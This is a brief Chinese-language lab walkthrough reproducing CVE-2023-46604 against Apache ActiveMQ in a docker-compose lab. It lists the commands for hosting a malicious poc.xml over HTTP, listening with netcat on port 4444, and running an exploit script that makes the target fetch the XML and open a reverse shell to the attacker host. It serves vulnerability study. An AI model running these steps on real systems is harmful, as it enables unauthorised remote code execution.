CVE-2023-46604

构建docker-compose,其中包含两个镜像:受害机与目标机,按所需环境配置 在受害机上,启动ActiveMQ
切换到攻击机: • 开启HTTP服务以发送poc: python3 -m http.server
• 使用netcat监听连接至攻击机 nc -nlvp 4444
• 发送载荷,建立反向shell连接至攻击机 python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 其中:
可见,执行‘exploit.py’文件后,利用代码会将web服务器上的‘poc.xml’报文发送至目标——即目标服务器上运行的ActiveMQ服务地址。同时,攻击机上的HTTP web服务器也会接收到来自目标机IP地址发来的请求。
发送载荷后,切换到攻击机上监听4444端口的终端。我们可以看到受害机的反向shell已成功回连。